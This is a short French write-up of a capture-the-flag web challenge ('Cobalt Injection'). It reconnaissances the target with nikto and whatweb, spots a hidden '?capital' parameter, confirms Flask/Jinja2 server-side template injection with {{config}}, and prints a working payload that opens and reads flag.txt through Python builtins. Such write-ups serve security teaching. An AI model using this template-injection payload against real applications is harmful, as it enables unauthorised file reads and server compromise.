# Solution Cobalt Injection

Il s'agit d'une landing page. Pas de page supplémentaires. 

Un scannage avec **nikto** soit `nikto -h http://chall.battlectf.online:8085/` revèle

    Python/3.8.17 appears to be outdated (current is at least 3.9.6).

On peut confirmer avec `whatweb`

<img src='2.png'>

Une vulnérabité web liée au python3.8.17 ???  Il y a deux principaux framework de développement web avec python (flask et django)

Une inspection de la page web montre en commantaire: **IP?capital=Benin**

Il existerait donc un paramètre **?capital** qui prend le nom du pays ? 

Voici un blog qui explique bien la vuln SSIT de flask et l'identification  [python-flask-jinja2-ssti-example](https://kleiber.me/blog/2021/10/31/python-flask-jinja2-ssti-example/)

Passez `{{config}}` (http://chall.battlectf.online:8085/?capital={{config}}) display la config. La vuln est donc présente.

Il y a plusieurs payloads disponibles qui fonctionnent bien. Voici ce que j'avais utilisé:

    http://chall.battlectf.online:8085/?capital={{%20get_flashed_messages.__globals__.__builtins__.open(flag.txt).read()}}


**flag:** battleCTF{wahala_1nj3ction_in_country}
